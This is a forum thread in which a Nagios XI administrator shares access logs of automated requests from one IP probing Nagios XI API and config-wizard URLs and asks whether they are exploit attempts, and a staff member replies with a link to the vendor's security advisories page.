185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:20 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:18 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:23 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:23 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:29 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:29 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:30 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:25 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:34 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:59 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:59 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
185.183.84.197 - - [20/Jan/2021:11:17:39 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
I have many many more logged attempts, but they're all calling basically the same URL's.

I don't know exactly what they're attempting to do and have no evidence of a vulnerability actually being exploited in my particular case, but the calls to xi-specific URL's has me concerned that there is something very specific they're looking for, likely an an old version of xi?

I have verified I am running the latest xi release (I basically always am on latest), and I also ran updates for the components/config wizards (I think these all got updated at 5.8.0 anyway).
I have also implemented some additional firewall rules, but I wanted Nagios staff to be aware that this is happening in case they weren't, and maybe remind people that you should keep your stuff updated at all times, especially if it's publicly reachable.
Dev & Prod xi: Debian 12 - Nagios xi 2024R1.3
Top
dchurch
Posts: 858
Joined: Wed Oct 07, 2020 12:46 pm
Location: Yo mama

Re: xi being targeted by exploit bots

Post by dchurch »

Also keep in mind that Nagios does maintain a list of known security vulnerabilities in our products here: https://www.nagios.com/products/security/

If we find something, we'll put it there along with remediation steps.
If you didn't get an 8% raise over the course of the pandemic, you took a pay cut.

Discussion of wages is protected speech under the National Labor Relations Act, and no employer can tell you you can't disclose your pay with your fellow employees.
Top

Return to “Nagios xi